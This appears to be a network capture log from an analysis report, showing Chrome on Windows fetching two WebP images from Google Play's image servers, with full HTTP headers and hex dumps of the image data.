                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1098OUTGET /87mGXAuy0q0oyYxq5DNwHFzCByFtzDjw4clPWAURuOu3kRMcbWlwr0BzNfBNkz2wn2w=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 60476
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 03:02:33 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 6729
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC856INData Raw: 52 49 46 46 34 ec 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 08 00 00 00 9f 01 00 ca 00 00 56 50 38 4c eb eb 00 00 2f 9f 81 32 00 4d d0 92 6c db 6e db 60 2d 80 86 ec 75 30 ff 01 df 4b fa 99 7c 47 f4 7f 02 f8 df 7e fe 09 b6 c5 71 2e 9c e4 aa 3a ff 84 2c 2e d5 e1 32 f5 cf f0 a2 45 fa 43 ae a2 6f f0 8d 13 38 89 7e cf ff d3 eb 82 f3 83 eb 8b f3 93 0b ce 0f ae 2f 38 97 83 43 e6 d8 cd c1 21 9e 1c 10 81 cc b1 9b 83 43 e6 20 a8 64 aa 05 50 94 58 4b 94 16 30 19 0b 98 c4 dd 40 a9 33 41 bb 91 01 82 96 8a 40 d1 29 60 60 bc 6d 08 06 76 54 0d 8c 28 50 6e d2 d1 2c d5 25 e1 d6 8d 36 d4 62 06 89 75 9b 97 fb 66 aa 09 96 fb d1 ac 37 7c f2 7e 53 4f c5 8e 29 08 97 a0 d9 99 76 53 e4 7a 3f d4 eb 75 2f e9 cb 33 66 f1 cc 0f 72 ee bb 5a ee d7 2d 7d 3d f7 32 c5 77 ce 5e b8 a4 ed 86
                                                                                                                                                                                                                                Data Ascii: RIFF4WEBPVP8XVP8L/2Mln`-u0K|G~q.:,.2ECo8~/8C!C dPXK0@3A@)``mvT(Pn,%6buf7|~SO)vSz?u/3frZ-}=2w^
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 04 bd 0b da d1 3b 3c 3c 00 f9 7c e9 fc 99 9f e7 a8 71 87 c3 c2 5c d3 83 9b 5b 94 97 84 2a 42 b8 23 cf be 0c cb 96 c2 2f 0f 23 c7 f9 c1 6d 7d 6e 54 b3 91 67 fd 20 e3 a1 88 27 20 df d2 19 97 72 5a 92 69 cd c6 90 19 8a 55 82 67 45 1b 58 7a 4a 0a 5b 3c 13 74 35 73 82 07 6a e0 ea e7 7f 39 80 7c d5 a9 c8 53 6c 9e 97 b4 38 ef 37 c3 df e3 dd c6 7d 77 ba 8d 5d 76 00 12 11 fb 0f 1d 16 f6 cb 7e 91 c5 56 4d cb b0 25 f3 61 30 95 f9 71 b7 00 90 87 30 4f 85 73 66 cd 57 b9 4b b6 76 58 d1 ce 9b 47 26 00 5a e0 3e e6 46 5e 31 05 7a 42 00 00 20 bf f9 a1 30 ad 6c 53 db 04 99 f7 72 ce 39 2f 2d e3 06 15 00 f9 50 57 a3 52 d5 eb 8e 8a 6c 27 55 50 4f d5 ef bf 99 0f 73 00 a0 dc 48 d5 f4 1f 10 e8 f2 cd 61 00 b4 d1 74 35 d6 06 80 fc 46 90 73 99 4b 92 b5 5a 61 9f af 81 a8 e4 3b 20 6e
                                                                                                                                                                                                                                Data Ascii: ;<<|q\[*B#/#m}nTg ' rZiUgEXzJ[<t5sj9|Sl87}w]v~VM%a0q0OsfWKvXG&Z>F^1zB 0lSr9/-PWRl'UPOsHat5FsKZa; n
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 6d db 9e b6 91 24 19 82 85 64 ca 6d 60 78 26 ed 30 d3 32 33 33 d3 11 f3 fe 80 dd 23 66 66 66 66 66 66 de 2d d7 65 6e 03 76 6a 4b ba ae da 56 e4 cc 1f 90 23 c2 0d 00 b4 6d 43 f7 06 2c 4b ca 68 fb 7b bb ad 6d 79 1b 69 db b6 7d 3f e0 3c 4f 91 65 3b 71 12 57 a5 52 95 ee 82 e6 be 6e 66 66 66 e6 fb fe 84 df 99 99 99 99 99 99 19 9a b9 aa a1 3a 29 0c 1a 64 c1 09 c7 71 ec db 28 18 d7 88 ee 71 fd 00 59 d3 6d db c6 b6 6d cf 98 73 ed e3 38 cf f3 c2 ad 07 ef a3 d8 b6 6d bb ee 14 d3 f2 2f 52 4e 2d 2d ff c1 4e d1 b6 f9 ea 7b 8d 47 f7 7d 5f 3a cf e3 d8 6b ea 91 6d 5b b5 6d db a9 b5 f5 b1 d6 3e 70 ef e3 2f 66 66 c9 92 72 20 4f 96 5c 4a 83 52 23 eb e7 42 2e 79 4a 00 33 d3 fb 0f 2e df 7b f6 5e 6b f6 16 0e 24 49 52 a2 c4 e1 64 71 58 7b 80 fe 01 00 55 39 8d b5 73 ae db cc 1d
                                                                                                                                                                                                                                Data Ascii: m$dm`x&0233#ffffff-envjKV#mC,Kh{myi}?<Oe;qWRnfff:)dq(qYmms8m/RN--N{G}_:km[m>p/ffr O\JR#B.yJ3.{^k$IRdqX{U9s
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 8a 4f 3d f1 93 3d 09 88 c8 e9 5d 49 46 52 2a 96 f6 05 88 48 2d 06 38 c8 25 9d 38 09 29 a6 bf 9d cb bc 24 de b0 ba 1b 3b a2 6c cb 1c d3 75 c0 09 4c 6a c4 1a 41 9c c0 ed 75 69 4b a0 a4 63 12 30 ac 0c 25 4e 84 4e 1d 44 17 4e cf b2 60 5e 58 b4 a3 50 53 04 d6 31 82 dc 52 c0 87 0c 94 87 10 f5 95 bc 40 9e 8a fe 9c fa 39 02 36 f1 7c aa 4b 26 81 90 af 98 81 48 67 bc 78 a5 2e 20 c7 5c 95 16 67 1a 44 a8 1d f9 e4 18 85 ec 4c 46 08 ab 42 45 a4 64 36 35 23 88 02 db 23 13 f1 e1 cd a6 0b bb ae 51 a3 c4 2a 59 ea 83 94 8b 5d a6 4c 64 5d a6 6c 48 a0 a4 d5 39 4c 7d e1 08 48 35 4e eb 24 14 f0 54 e4 b2 0b a5 e2 a9 53 7f f1 8d fd a7 9f d1 35 46 00 fa 62 e1 ce aa c7 bf 57 cf 1b 64 8c 16 ac c6 3d f7 f0 95 eb fd 20 5c 8d 6f 9d 5c 97 f9 8a 3f cf d7 24 99 6d 98 ab 71 c5 49 ab 92 4e
                                                                                                                                                                                                                                Data Ascii: O==]IFR*H-8%8)$;luLjAuiKc0%NNDN`^XPS1R@96|K&Hgx. \gDLFBEd65##Q*Y]Ld]lH9L}H5N$TS5FbWd= \o\?$mqIN
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 6d e9 f1 54 34 91 63 62 11 c6 b5 f7 51 74 21 35 90 32 3b 4a 09 c3 1d ed 7b e3 fe 41 ae 0e b5 0c 69 63 cf 22 47 90 48 9c 1c 15 6b ff 9c a2 d8 86 4c 74 e5 d5 35 8e 42 e3 dd 5c a2 18 21 4a e0 f0 70 05 a4 c4 38 0b e9 e7 61 4f 7d ff c3 be a3 17 c6 a0 7b c1 3b af 61 d5 35 3f 37 6e dc bc d9 0c c0 e1 a1 e9 8f 5d 8e 66 1f 2a e7 6a 63 06 18 e7 7f e8 a1 9a 76 6d ea ce ce b4 25 23 86 3d 75 2a 85 1c ed 4d 13 44 7a e2 c5 b5 20 34 43 2b 95 6d 38 97 38 97 06 31 c3 de cc ef 73 19 77 ac 71 5e ee ba 3e 19 31 3c da 03 44 44 99 a9 18 53 a8 d7 48 68 84 d9 c2 69 4f 17 ca 44 34 ee 9c 66 47 36 65 16 50 4b db 47 5e 7e 4d 7e fe b5 f9 20 94 bf 52 b8 de 5b de fa ba ef 9d ff 2b 22 82 ee fd fd 95 6f 3e fc 92 4d cf 7f fb 9e f9 8f c8 6b 60 81 c0 60 be ef e2 a3 5f 3b e5 f8 4b b5 6d 76 16
                                                                                                                                                                                                                                Data Ascii: mT4cbQt!52;J{Aic"GHkLt5B\!Jp8aO}{;a5?7n]f*jcvm%#=u*MDz 4C+m881swq^>1<DDSHhiOD4fG6ePKG^~M~ R[+"o>Mk``_;Kmv
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 62 d1 13 93 da 66 b7 c0 09 a4 ea 34 72 be fb 7e f1 f0 af 5d 47 93 ff ee c6 8f 8c e4 82 de f9 ce 52 8b a7 26 57 be e4 99 87 3d fb 3b f7 b7 fc d2 5b 27 5e 3b 83 89 40 b2 84 02 33 b1 f7 51 de fc d7 cc ff ca 53 85 0f 78 a1 f4 cc 16 6e 18 34 d5 7d c8 24 80 d7 3f 96 34 d4 d1 7b 19 fd fe 4f 0e bd 76 16 16 b5 66 db 46 48 7a 56 ba 7b ee 7f e9 3a 7a 38 5b be f8 13 83 27 0e 98 fe fd a5 df 72 31 ff bb 4e 5a bb 5d fb 0c d1 43 10 80 9e bf 2e 6a 3a e6 76 ed fb f3 1d f8 db fb fb 3f ed d1 3e 1d 30 29 62 b5 eb 5f 3c 16 ff e1 65 d5 63 b7 6b de fd d0 10 16 50 a3 99 db ed d0 e9 8e bd c7 31 fc 71 4f 06 ee 39 50 92 7c fc 7d dc f7 05 e7 ae af 7c 58 78 ac 89 b7 14 4f b0 ec 7e 0a c6 f4 82 ed ef 63 e9 bf 8c 4b bf fc 5b 4f 5f 9d e0 b5 6d 76 3e a5 b6 e5 2b 6f ca 1f 77 e4 77 53 c3 ee
                                                                                                                                                                                                                                Data Ascii: bf4r~]GR&W=;['^;@3QSxn4}$?4{OvfFHzV{:z8['r1NZ]C.j:v?>0)b_<eckP1qO9P|}|XxO~cK[O_mv>+owwS
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 70 d4 79 5f 3b f4 8e b3 62 2c dd 07 aa 80 0c 40 7c 8c 97 dd a8 91 a2 58 ae b2 ff 9c 01 79 e4 93 b7 74 7a cc 9d 8e 22 01 19 7c e0 8b e6 82 bf be 8f 71 86 de 34 1a ab 16 2f bc 88 9a 47 7d 41 ef 2c e7 4f 8d fc 09 e1 df 8b 90 29 31 05 dd 5b f3 5f d7 fe f5 08 78 c5 da d7 17 98 ed 9e 40 8c 7b 37 34 55 6a cc 53 36 5d 86 0e d3 7f 78 84 f6 7e f0 a3 b1 13 d5 7d a4 24 04 fa e9 6b df b5 a5 b7 8b 3c 78 14 13 7d e5 a0 00 e6 da 94 5b 69 5f 49 e2 73 1b 4c 15 e6 bb bc 84 f7 f1 51 8a fc 77 fa 60 88 f7 92 a5 06 f3 d9 2a 94 3d db ab 6e 55 3e 19 45 32 42 4e fe 23 1b 6e 14 d9 ba 8e a9 11 55 ef c7 74 b3 85 d7 72 17 bb 38 1a 8f 97 93 a9 9c c9 7e 93 90 2d 38 3b 41 bd 1b ae ee be 2d bf f3 78 82 eb 29 f0 69 0e e7 5b 8c e3 a2 b9 02 4d 0d 66 6b 15 72 af d9 3f 8e ea 23 0d b7 46 5a e5
                                                                                                                                                                                                                                Data Ascii: py_;b,@|Xytz"|q4/G}A,O)1[_x@{74UjS6]x~}$k<x}[i_IsLQw`*=nU>E2BN#nUtr8~-8;A-x)i[Mfkr?#FZ
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: bf 02 8b 01 e8 5a 60 40 ee 1e 4c f7 49 38 57 2d a1 c1 1a 55 14 11 88 65 07 47 87 00 17 21 34 0d 4b c9 fe 35 0c 58 8a 15 75 d4 31 a1 32 d2 a8 ea 01 bc bf 6d 9c 28 43 61 be 6a 93 fd 7a d7 3d 29 2a a4 c1 40 d0 d2 32 a9 b7 75 ad 55 b2 00 0d 68 50 54 82 83 7b 11 8d c1 a2 8b d0 0c 36 5a 07 91 43 87 8b 47 8a 00 c0 24 a8 a7 e7 43 0b a2 92 1c 5b fa 01 d8 44 d5 e0 66 dc 9c 59 33 48 1d e6 2a 16 db 40 89 d5 67 cb 6f 9c 38 1e 0e 50 9b cc 50 53 80 19 9b ed c4 3e 35 62 90 df 8c 83 22 14 08 79 3b 4f d1 4f 81 f3 e8 41 d3 b0 38 01 84 89 82 25 0a 28 d2 27 e3 21 02 30 9b 97 d4 97 4d 6a 3a 31 12 2d 53 c0 a1 2e 4f 28 41 ed ea 6e 69 e4 c3 87 73 c8 76 6e 98 fb 58 ca b3 bc 82 06 a6 02 04 85 1d 66 d9 4a 13 49 76 ec 40 42 7d 6c 8f 2c 65 c1 e5 17 bc 81 11 16 61 c4 2f 69 49 cb 01 56
                                                                                                                                                                                                                                Data Ascii: Z`@LI8W-UeG!4K5Xu12m(Cajz=)*@2uUhPT{6ZCG$C[DfY3H*@go8PPS>5b"y;OOA8%('!0Mj:1-S.O(AnisvnXfJIv@B}l,ea/iIV
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: a0 87 74 84 88 74 d0 1d a9 ae 59 f1 cf 4a 11 16 18 8d 45 7f 5a a5 b0 5f 8c 1a f6 e9 b3 03 68 40 0f ab 49 6a 00 82 1a 95 3b dd cf b0 7e dd 3c e9 a6 96 19 7d 99 f3 0e db 70 22 a3 ca 0e 02 1c 52 6c 20 a9 29 9d 54 fa dc 98 0c 86 cb 50 eb ba 36 ed 50 6a 58 d0 7c f7 7c 6f d1 c2 7b 63 6c 8e d6 06 b8 fb 81 3c 1d 34 e7 bd 27 67 9c e9 d3 dc a3 57 00 11 9d 61 c5 2d 08 6d 5a 26 cb 55 5e f4 8e 15 5b 7c a9 1c 6a 28 e5 57 76 bf 46 8d 8c fe 3a 8e b6 8f a5 ec e4 04 26 e8 27 61 36 43 c6 5c 7a 31 a7 1c f3 7b 59 5a ad 7a 93 28 4e e9 41 8f fc c8 4d fa 26 b6 0d 3d cb a9 dc c1 a1 f8 2c 21 61 6b ec ca e6 92 29 de e3 df b3 64 71 bd 67 88 72 c2 d5 7e 57 5a df 69 18 4a 47 5b 6f 18 90 2a ce 40 fb 6f 22 86 36 73 1a 4a fe 2c 01 36 d0 47 33 c6 dd 4f bd f1 78 fd 3f e4 5e 7d 45 a3 48 b2
                                                                                                                                                                                                                                Data Ascii: ttYJEZ_h@Ij;~<}p"Rl )TP6PjX||o{cl<4'gWa-mZ&U^[|j(WvF:&'a6C\z1{YZz(NAM&=,!ak)dqgr~WZiJG[o*@o"6sJ,6G3Ox?^}EH
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: a1 eb d9 68 65 53 0f 4c c3 8d 2f f5 6f 2d b3 2c ed 4f ba 66 f3 de b5 22 e2 a7 47 bb cd f6 1d 90 95 b9 fd 0d 00 b8 7b f7 ee 58 85 b1 c8 77 d6 f9 1b 77 1a fb 1b 3e ee 77 76 b2 fc bc 1f fe fc e7 7c e7 c7 ab db 87 df ad 84 db d5 d6 47 45 4d 15 04 5c ab 8d 92 82 e6 50 56 89 04 d4 1c 64 11 80 82 17 e9 f9 00 af 4b 8a e2 e4 27 a6 e3 46 de 6b 77 42 db b7 9e d8 34 b6 55 d9 fa 81 f3 ea 94 7f 5e 67 02 1f 4f 0f e0 11 7d d8 fd bf 95 6f 70 7d 75 cc 42 73 77 e7 e3 c5 97 ee be c2 bb 7f 0c 9f fe 1a f0 e1 eb f7 5f 3b bf 62 07 af 7e 14 8e 3f fa 35 af ff cb 58 00 3e b6 5f c2 2e 72 aa 60 d2 c8 00 82 06 7e a0 a8 34 60 50 ac b8 66 84 de ae 5b ce be 30 b2 57 dc 67 d5 4e ff 72 77 71 e7 34 8b c6 ae 52 0a 5a dc a1 29 09 49 50 d2 94 e5 0c 9c aa 2f 2c 76 02 65 54 04 bd 94 83 10 45 d0
                                                                                                                                                                                                                                Data Ascii: heSL/o-,Of"G{Xww>wv|GEM\PVdK'FkwB4U^gO}op}uBsw_;b~?5X>_.r`~4`Pf[0WgNrwq4RZ)IP/,veTE


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                103192.168.2.449990142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1098OUTGET /K6kGejYk6GTdg5AenV4A0e-Nc48xjZ_-Qj50IUO5pUCf0V6EpJbeOku4Rk73atcPD4A=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 75826
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:53:46 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 56
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC858INData Raw: 52 49 46 46 2a 28 01 00 57 45 42 50 56 50 38 4c 1e 28 01 00 2f 9f 81 32 00 4d 48 0c c0 36 6c 9b 00 14 08 49 90 fe 3f d8 ea f6 42 44 ff 27 40 6a 03 08 9e 7e 26 92 9f dd 66 77 af 19 c7 00 6d 7b 59 c2 df 04 b0 3e d4 1f bc 3d 04 40 01 ed 82 1d db 56 f2 09 f8 e0 08 2a f2 2b f8 ee 3a 01 86 3d fc 4e f8 06 2c 20 00 ee bd 49 02 5c 9f 7b ef ed aa fc 38 48 ce 84 d3 0e 99 24 64 0e 0f f8 3b 49 c2 9c cf 39 07 b8 48 55 92 41 60 42 9e 73 86 ef ed 24 bf fc 23 92 5c a0 26 40 f2 47 92 b0 65 7b bb c8 84 e4 6c 40 49 80 00 37 01 8c 83 78 c6 97 40 71 2d 70 f9 39 98 e7 b2 a5 9c 93 2c e3 ef 93 7b c9 90 7d aa 0c 7f e7 34 09 db 96 f4 b8 1f 63 5a b2 c9 00 f3 9c 93 40 28 60 d8 fa ec bd ed ee d9 2d f1 9e 5b 09 80 79 4e f2 40 2f 60 4c 2f 9e 31 28 79 62 3e b6 6d 7d ee 2a c7 f1 6d 20 24
                                                                                                                                                                                                                                Data Ascii: RIFF*(WEBPVP8L(/2MH6lI?BD'@j~&fwm{Y>=@V*+:=N, I\{8H$d;I9HUA`Bs$#\&@Ge{l@I7x@q-p9,{}4cZ@(`-[yN@/`L/1(yb>m}*m $
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: bd 8d 9c 3b f7 22 84 4a e5 1b 94 f8 1a 4c df 4d 6d c5 76 cd 11 47 d3 11 97 57 c0 33 3c 1b f8 62 78 de 2c 8d 13 db f3 f5 f1 7c bb e3 ff a3 fd 14 b9 bd 76 bb d2 24 4e f5 a2 01 a2 e6 85 39 7a 74 41 0a 54 8d 1a 15 14 a0 34 7c c3 50 a3 26 75 9b d9 fa 74 e8 9c 70 8d 67 0b cf 76 fc cc b5 e6 62 e5 31 fb cb 3f 87 ab 1f cb bc 2c e3 9b eb 2d f5 a8 02 f4 1d 8f 9a d7 d6 5b d6 4f cd a6 0a 78 a1 26 2e 53 8f 07 89 28 00 08 00 8a a9 4a e0 f5 01 a1 41 32 25 da 05 c6 c3 54 0f 5d 78 80 e3 f5 66 b4 76 51 2b 11 8a 71 de 94 68 c1 a1 bf 34 3b ca dd 28 98 af 54 6b a3 99 7c 77 88 8b 5e 94 65 01 60 53 14 c5 99 ba b6 87 75 61 1d ae 54 54 3d 40 10 c4 c9 f0 b2 b6 32 34 8b ef 22 7c c6 f9 17 bf 7d d8 56 a3 fd 37 bd b2 dd 5f 67 94 f4 a8 58 9e 10 c4 1c e7 2e 0c eb 05 f9 b9 af ef 58 06 8b
                                                                                                                                                                                                                                Data Ascii: ;"JLMmvGW3<bx,|v$N9ztAT4|P&utpgvb1?,-[Ox&.S(JA2%T]xfvQ+qh4;(Tk|w^e`SuaTT=@24"|}V7_gX.X
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 5a a1 55 97 af 97 97 f3 ec 3a bb ca a9 6f 3a a6 7b 81 16 94 45 3c f0 c6 6d a9 6b ab d4 6d dd ed 8a 97 b7 6d 4d b7 b9 35 57 db 8a aa 1d 80 17 9f a6 9b db 9c 5b 35 6f d4 20 e5 fb 74 f3 78 d6 b9 f5 38 41 05 bf a8 73 53 9d 8a ea e6 00 ca 97 0f 3e 36 bf 4e a9 55 82 a8 80 20 4c 38 d6 be e8 7e 5d a7 8a e0 01 a6 8a b9 db 5e e4 8b 12 20 36 a1 36 b3 56 6b be ce 1e aa 0e a0 b2 eb 7a 7e e5 83 5d 45 c0 42 2a 87 ec d3 50 0e 0e 12 90 2d e7 30 cf 5a 7b e5 44 10 3a 6f e6 ff 79 a1 02 3e ef 1f 82 27 8f 2a c7 fc 1f 57 ae d9 ff bf b6 6d c9 99 73 df 5b a6 7d cb 7b ef 3d 94 a8 45 dd 5c 82 82 cd e4 bd 98 f7 5e c2 de 7b ef bd f7 de 7b af f2 de 57 ad 01 e6 da fb 76 9d 08 3e 54 e1 78 a9 b8 e0 a5 7f f8 c3 23 85 af a8 12 e8 38 9a 4e 7a f1 82 93 fe f0 48 61 cb c5 d1 79 0c a6 67 d0 4d
                                                                                                                                                                                                                                Data Ascii: ZU:o:{E<mkmmM5W[5o tx8AsS>6NU L8~]^ 66Vkz~]EB*P-0Z{D:oy>'*Wms[}{=E\^{{Wv>Tx#8NzHaygM
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: a5 f5 3e e6 da fb dc af d0 5a 5a ca 27 b0 3f b6 ae 04 16 2e 16 58 50 02 8d fb 0b 40 39 f0 b1 b4 a9 b5 86 73 ce 5e 73 f6 1e 13 20 27 db b6 c5 72 c2 cc cc 9c 8a a1 62 e6 8a b1 62 66 66 66 66 66 66 66 a6 8a 99 99 99 99 e9 9f ff 9b b3 47 c1 eb 63 54 8c a0 a0 a7 68 88 8d b5 10 9a 2e 22 8e 8a 5c 51 16 09 71 10 23 11 c1 06 d8 c3 76 a3 21 a6 a2 2f 65 fa 44 45 ca d8 88 84 75 93 6e 8d 44 c4 18 89 88 71 15 31 6b e4 18 48 b7 06 82 dd 71 11 11 13 f0 e3 9e 3c 82 7d ed 72 27 bb 0a 20 87 8c 22 97 52 4a 82 ef 8c 5d b0 a7 81 bc 41 69 cf 80 fa 0e 07 58 46 20 55 54 23 15 80 23 04 e5 0c a5 26 95 06 39 69 b1 bd 96 68 2c 08 53 df e9 71 a8 2c 00 8a ab 2c 4e 02 c4 ea 1a 26 23 90 94 2e 41 d4 9c a6 e6 4d cb 89 68 6a b9 c4 55 a9 60 3c 66 0a f0 c4 e5 02 70 d3 97 09 08 ac a5 e6 65 65
                                                                                                                                                                                                                                Data Ascii: >ZZ'?.XP@9s^s 'rbbfffffffGcTh."\Qq#v!/eDEunDq1kHq<}r' "RJ]AiXF UT##&9ih,Sq,,N&#.AMhjU`<fpee
                                                                                                                                                                                                                                2024-09-29 04:54:43 UTC1390INData Raw: 43 cf 10 1e 0d 47 59 f3 51 32 0c a6 1a 96 e1 00 ab b0 b4 43 45 e8 c0 c1 58 68 cb e9 4a 19 8a b4 6c ba ea 87 1c 66 2b f3 13 5e 34 50 ca 96 0f f5 a2 da a6 3c 15 cd ca 21 59 33 9b 28 c1 49 1c 74 d7 a0 83 6f d4 10 a8 84 68 dc 6d 57 1c 1b 4d 45 d6 6a a3 d1 3c 92 de 0f 95 c0 ec 60 08 3a c9 ed 61 19 32 04 0b 7a 06 3b f3 3d 8c 3d ee ce ee d2 35 d4 5a ab 1f 1c 5e a7 d3 1b e0 dd 37 57 50 d3 74 57 18 08 a0 cc 34 63 d1 35 d0 00 4a 1b af 99 bb 1f 5c 7f 6c ca cc c7 d6 72 6f ee 9e 07 ee ee f8 8c bb b8 e6 5a 0f f0 36 41 09 65 0f 02 22 4f 5c 49 ef d9 5f 10 40 0b c8 f8 bd 78 7f 58 eb 99 2f 9b 8d 27 4e a6 0b af 97 50 57 06 c0 9b 54 43 21 28 37 15 e0 a6 44 02 68 df 82 d5 49 e6 38 11 02 38 b6 38 37 cd 07 a5 46 00 89 af 68 aa 4e 84 39 27 f0 6b 01 dc 80 79 30 00 74 43 ab 70 67
                                                                                                                                                                                                                                Data Ascii: CGYQ2CEXhJlf+^4P<!Y3(ItohmWMEj<`:a2z;==5Z^7WPtW4c5J\lroZ6Ae"O\I_@xX/'NPWTC!(7DhI8887FhN9'ky0tCpg
